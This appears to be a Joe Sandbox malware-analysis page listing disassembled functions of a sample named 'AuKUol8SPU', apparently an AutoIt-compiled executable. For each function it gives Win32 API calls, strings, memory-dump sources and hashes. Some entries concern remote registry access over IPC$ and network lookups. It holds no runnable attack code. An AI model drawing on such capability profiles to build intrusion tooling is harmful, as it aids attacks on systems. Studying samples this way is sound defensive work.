_memset.LIBCMT ref: 00B72D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00B72DDD
GetMenuItemCount.USER32(00BD5890), ref: 00B72E66
DeleteMenu.USER32(00BD5890,00000005,00000000,000000F5,?,?), ref: 00B72EF6
DeleteMenu.USER32(00BD5890,00000004,00000000), ref: 00B72EFE
DeleteMenu.USER32(00BD5890,00000006,00000000), ref: 00B72F06
DeleteMenu.USER32(00BD5890,00000003,00000000), ref: 00B72F0E
GetMenuItemCount.USER32(00BD5890), ref: 00B72F16
SetMenuItemInfoW.USER32(00BD5890,00000004,00000000,00000030), ref: 00B72F4C
GetCursorPos.USER32(?), ref: 00B72F56
SetForegroundWindow.USER32(00000000), ref: 00B72F5F
TrackPopupMenuEx.USER32(00BD5890,00000000,?,00000000,00000000,00000000), ref: 00B72F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00B72F7E

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 16933089803a0e9bda5acca7bff088881101a48244ae76ef7f8eb1431b12ac7f
Instruction ID: 107ad2b504e3562b4bfca25cd0295dddecc4e292e83c4c82ddea7e9d0d993d35
Opcode Fuzzy Hash: 16933089803a0e9bda5acca7bff088881101a48244ae76ef7f8eb1431b12ac7f
Instruction Fuzzy Hash: 8D71D470600206BBEB218F54DC85FAABFE4FF04364F1082A6F639AA1E1CB715C50D7A0

Function 00B677DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00B17BCC: _memmove.LIBCMT ref: 00B17C06

_memset.LIBCMT ref: 00B6786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00B678A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00B678BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00B678D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00B67902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00B6792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B67935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B6793A

Strings

SOFTWARE\Classes\, xrefs: 00B6780C
\IPC$, xrefs: 00B67882
\CLSID, xrefs: 00B67822

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: defdc8f38c79f868a2b4137864bdde5777c6a804df670bd2a619a97f8d719c9d
Instruction ID: 6180e7c100288f439118f709a1f7c2503bef9d449d95167d12cf09d876b1bf90
Opcode Fuzzy Hash: defdc8f38c79f868a2b4137864bdde5777c6a804df670bd2a619a97f8d719c9d
Instruction Fuzzy Hash: C441F57285422DABCB21EFA4DC85DEEB7B8FF14354F4044AAE805A31A1EE345E44CB90

Function 00B90E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B8FDAD,?,?), ref: 00B90E31

Strings

HKCR, xrefs: 00B90ED9
HKLM, xrefs: 00B90EAF
HKEY_CURRENT_CONFIG, xrefs: 00B90EEE
HKU, xrefs: 00B90F43
HKEY_CLASSES_ROOT, xrefs: 00B90EC4
HKCU, xrefs: 00B90F21
HKEY_CURRENT_USER, xrefs: 00B90F10
HKCC, xrefs: 00B90EFF
HKEY_USERS, xrefs: 00B90F32
HKEY_LOCAL_MACHINE, xrefs: 00B90E9A

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: bfb0f3797d9c1ad806e3257759a28185d7d9f75a27978ec7757e5c01a90efb20
Instruction ID: 0ad1f212bc1f4c391ded67e916bb0caf496115f74737e3c00ae9a4a07fd525eb
Opcode Fuzzy Hash: bfb0f3797d9c1ad806e3257759a28185d7d9f75a27978ec7757e5c01a90efb20
Instruction Fuzzy Hash: 7E41F83212424A8FDF24FF14E865BEE37E4AF21350F5404E4FC5657292DB309A5ACA60

Function 00B974BB Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00B9755E
CreateCompatibleDC.GDI32(00000000), ref: 00B97565
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00B97578
SelectObject.GDI32(00000000,00000000), ref: 00B97580
GetPixel.GDI32(00000000,00000000,00000000), ref: 00B9758B
DeleteDC.GDI32(00000000), ref: 00B97594
GetWindowLongW.USER32(?,000000EC), ref: 00B9759E
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00B975B2
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00B975BE

Strings

@U=u, xrefs: 00B97578
static, xrefs: 00B974F6

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: @U=u$static
API String ID: 2559357485-3553413495
Opcode ID: 5e895515466af62a45f252e2cb3b99db7f59bb70d3a631f121b4939afb5f0850
Instruction ID: beecb0e70250a80eb66aed393caf8f40e01b3f7ee82e1461ae10edb34299371a
Opcode Fuzzy Hash: 5e895515466af62a45f252e2cb3b99db7f59bb70d3a631f121b4939afb5f0850
Instruction Fuzzy Hash: 4E319C32104216BBDF119FA4DD09FEB3BA9FF1A320F114265FA15E21A0CB31D821DBA4

Function 00B6F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00B4E2A0,00000010,?,Bad directive syntax error,00B9F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00B6F7C2
LoadStringW.USER32(00000000,?,00B4E2A0,00000010), ref: 00B6F7C9

Part of subcall function 00B17DE1: _memmove.LIBCMT ref: 00B17E22

_wprintf.LIBCMT ref: 00B6F7FC
__swprintf.LIBCMT ref: 00B6F81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00B6F88D

Strings

., xrefs: 00B6F873
Error: , xrefs: 00B6F85B
Line %d:, xrefs: 00B6F818
%s (%d) : ==> %s.: %s %s, xrefs: 00B6F7F7
Line %d (File "%s"):, xrefs: 00B6F833

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: 603dc8f42deedb61d80d27d5fe911aed12417588f007fdc54f63d1c3373b788c
Instruction ID: fb375421a148dac092e135579f7ac55be482e6b8c1bc188db83482ea242d37e9
Opcode Fuzzy Hash: 603dc8f42deedb61d80d27d5fe911aed12417588f007fdc54f63d1c3373b788c
Instruction Fuzzy Hash: E2215E3294421AEBCF11AF90CC5AEFE77B9FF18311F4408EAB505660A1EA319658DB51

Function 00B752C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00B17BCC: _memmove.LIBCMT ref: 00B17C06

Part of subcall function 00B17924: _memmove.LIBCMT ref: 00B179AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B75330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B75346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B75357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B75369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B7537A

Strings

play PlayMe wait, xrefs: 00B75364
close PlayMe, xrefs: 00B75341, 00B7536E
alias PlayMe, xrefs: 00B75309
play PlayMe, xrefs: 00B75375
status PlayMe mode, xrefs: 00B7532B
open , xrefs: 00B752DF

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 89b6a0c53265b3fa3c716f0a2a88df6faf8efea21daec03c52a56852659cb5a9
Instruction ID: e7c743945f85eb9ffd62d407c4de6985d2f7c8935617cbca634d189cfd4ccc6b
Opcode Fuzzy Hash: 89b6a0c53265b3fa3c716f0a2a88df6faf8efea21daec03c52a56852659cb5a9
Instruction Fuzzy Hash: F7118231A9012979D720B761CC4AEFF7BFCEB91B90F4008AAB416A30E1EEA01D44C5A0

Function 00B746B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00B746D2
gethostname.WSOCK32(?,00000100), ref: 00B746EC
gethostbyname.WSOCK32(?), ref: 00B746F9
_wcscpy.LIBCMT ref: 00B74721
_memmove.LIBCMT ref: 00B74734
inet_ntoa.WSOCK32(?), ref: 00B7473F
_strcat.LIBCMT ref: 00B7474D
_wcscpy.LIBCMT ref: 00B74764
WSACleanup.WSOCK32 ref: 00B74772
_wcscpy.LIBCMT ref: 00B74780

Strings

0.0.0.0, xrefs: 00B7471B

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: e6b4a4c3325ed44ae3d54811a0a8c4eb1890c8b7f5decd48bc78077b6a8b75bf
Instruction ID: 3f3899b7411cdcdff552921c7f5e255c626ad3a6ef81c20d2dd878ecd659a432
Opcode Fuzzy Hash: e6b4a4c3325ed44ae3d54811a0a8c4eb1890c8b7f5decd48bc78077b6a8b75bf
Instruction Fuzzy Hash: D411EB31600115AFCB25AB709C86EEA77FCDF02722F1481F6F459D7161EF719D818650

Function 00B7D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON

Download Yara Rule

APIs

Part of subcall function 00B19837: __itow.LIBCMT ref: 00B19862
Part of subcall function 00B19837: __swprintf.LIBCMT ref: 00B198AC

CoInitialize.OLE32(00000000), ref: 00B7D5EA
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B7D67D
SHGetDesktopFolder.SHELL32(?), ref: 00B7D691
CoCreateInstance.OLE32(00BA2D7C,00000000,00000001,00BC8C1C,?), ref: 00B7D6DD
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B7D74C
CoTaskMemFree.OLE32(?,?), ref: 00B7D7A4
_memset.LIBCMT ref: 00B7D7E1
SHBrowseForFolderW.SHELL32(?), ref: 00B7D81D
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B7D840
CoTaskMemFree.OLE32(00000000), ref: 00B7D847
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00B7D87E
CoUninitialize.OLE32(00000001,00000000), ref: 00B7D880

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 14d60b7231e1c43183b4c75453a67e11769520bbe30edbc6edc68612e4cc5a93
Instruction ID: 5e8882b2208e2fd4f955a1ebb0600fc056f770b9623efe062320a85cfb44dec1
Opcode Fuzzy Hash: 14d60b7231e1c43183b4c75453a67e11769520bbe30edbc6edc68612e4cc5a93
Instruction Fuzzy Hash: 9EB1EB75A00109AFDB04DFA4C894DAEBBF9FF48354B1484A9E919EB261DB30EE45CB50

Function 00B6C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00B6C283
GetWindowRect.USER32(00000000,?), ref: 00B6C295
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00B6C2F3
GetDlgItem.USER32(?,00000002), ref: 00B6C2FE
GetWindowRect.USER32(00000000,?), ref: 00B6C310
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00B6C364
GetDlgItem.USER32(?,000003E9), ref: 00B6C372
GetWindowRect.USER32(00000000,?), ref: 00B6C383
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00B6C3C6
GetDlgItem.USER32(?,000003EA), ref: 00B6C3D4
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00B6C3F1
InvalidateRect.USER32(?,00000000,00000001), ref: 00B6C3FE

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: dfac35fb9a481326168bd2509edc85ec90aec9fd3bb9efd427b84878d51b172e
Instruction ID: 416e8ad7137a667b6dc88eff81bbdb1c062392f0a130074ef001fc58873ad82f
Opcode Fuzzy Hash: dfac35fb9a481326168bd2509edc85ec90aec9fd3bb9efd427b84878d51b172e
Instruction Fuzzy Hash: 13513C71B00205AFDB18CFA9DD99ABEBBBAEB88710F14816DF915D7290DB749D40CB10

Function 00B1201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00B11B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B12036,?,00000000,?,?,?,?,00B116CB,00000000,?), ref: 00B11B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00B120D3
KillTimer.USER32(-00000001,?,?,?,?,00B116CB,00000000,?,?,00B11AE2,?,?), ref: 00B1216E
DestroyAcceleratorTable.USER32(00000000), ref: 00B4BCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B116CB,00000000,?,?,00B11AE2,?,?), ref: 00B4BCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B116CB,00000000,?,?,00B11AE2,?,?), ref: 00B4BCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B116CB,00000000,?,?,00B11AE2,?,?), ref: 00B4BD0A
DeleteObject.GDI32(00000000), ref: 00B4BD1C

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 6d647f205083ae8a618d274d08d8a5eef2fe218953fe4772446ae79e2006405a
Instruction ID: 48e6653228159dea9b56860e462bc5ab6a63caad83f732e965e15939057aac8a
Opcode Fuzzy Hash: 6d647f205083ae8a618d274d08d8a5eef2fe218953fe4772446ae79e2006405a
Instruction Fuzzy Hash: 9961BD31501A01EFDB359F14D998B69B7F2FF44312F9045AAE2429BA70DB71ADA0EB40

Function 00B121A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00B125DB: GetWindowLongW.USER32(?,000000EB), ref: 00B125EC

GetSysColor.USER32(0000000F), ref: 00B121D3

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: be2074aa737bde81d398612631e9acf5a0d1c91c907efc1acd9f8dbc0380236a
Instruction ID: d777dd05c294facfb4c37f5af879b0c14aac801037202c58dc17b3e85dbf76bc
Opcode Fuzzy Hash: be2074aa737bde81d398612631e9acf5a0d1c91c907efc1acd9f8dbc0380236a
Instruction Fuzzy Hash: 2241A131100150EBDB255F28DC88BF93BA5EB46331F6842A6FE659B1E1CB318D92DB91

Function 00B7A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00B9F910), ref: 00B7A90B
GetDriveTypeW.KERNEL32(00000061,00BC89A0,00000061), ref: 00B7A9D5
_wcscpy.LIBCMT ref: 00B7A9FF

Strings

all, xrefs: 00B7A911
unknown, xrefs: 00B7A996
cdrom, xrefs: 00B7A927
ramdisk, xrefs: 00B7A97F
network, xrefs: 00B7A969
removable, xrefs: 00B7A93D
fixed, xrefs: 00B7A953

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 9b123bd7d42d8c086f626778b979a627133e8f79d8410a6d1f4a1e43d04cfd11
Instruction ID: f74c1a8ce5f970c0bcfcecb78bba12760779457fe5e8cac6ca0c390370e9b418
Opcode Fuzzy Hash: 9b123bd7d42d8c086f626778b979a627133e8f79d8410a6d1f4a1e43d04cfd11
Instruction Fuzzy Hash: E651BE311183019BC744EF14C8A2AAFB7E5EFD4340F5088ADF5AA572A2DB71D949CB93

Function 00B98645 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B986FF

Strings

@U=u, xrefs: 00B98735

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: InvalidateRect
String ID: @U=u
API String ID: 634782764-2594219639
Opcode ID: 1102881891dd8787a0c4a82818188af8fcea9c99a646f9eab1b0a80e58e3ce90
Instruction ID: 81370b98957a94ddcf525839f79aa40cc3040ee1c17f1713f7c75d4e9f22828d
Opcode Fuzzy Hash: 1102881891dd8787a0c4a82818188af8fcea9c99a646f9eab1b0a80e58e3ce90
Instruction Fuzzy Hash: 0C518D30600244BEEF209B689C85FAD7BE5EB07760F6041B6F955EA1A1CF75AD90CB50

Function 00B12B72 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00B4C2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B4C319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B4C331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00B4C34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B4C370
DestroyIcon.USER32(00000000), ref: 00B4C37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B4C39C
DestroyIcon.USER32(?), ref: 00B4C3AB

Part of subcall function 00B9A4AF: DeleteObject.GDI32(00000000), ref: 00B9A4E8

Strings

@U=u, xrefs: 00B4C370, 00B4C39C

Memory Dump Source

Source File: 00000000.00000002.1375557670.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1375538517.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375664130.0000000000BC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375797120.0000000000BCE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1375877563.0000000000BD7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_AuKUol8SPU.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID: @U=u
API String ID: 2819616528-2594219639
Opcode ID: 0bb2e777a274d81c01cce441e400fb2bdbb46c053a10ab4ec40a37eddabaa985
Instruction ID: a09cbc805de85741830e6c922d3d2c404272700e6f626647f3e9ab062e57c60d
Opcode Fuzzy Hash: 0bb2e777a274d81c01cce441e400fb2bdbb46c053a10ab4ec40a37eddabaa985
Instruction Fuzzy Hash: A2516D74601205EFDB24DF64CC85FAA7BF5EB44721F5045A9F902D7290DBB0ADA0EB50

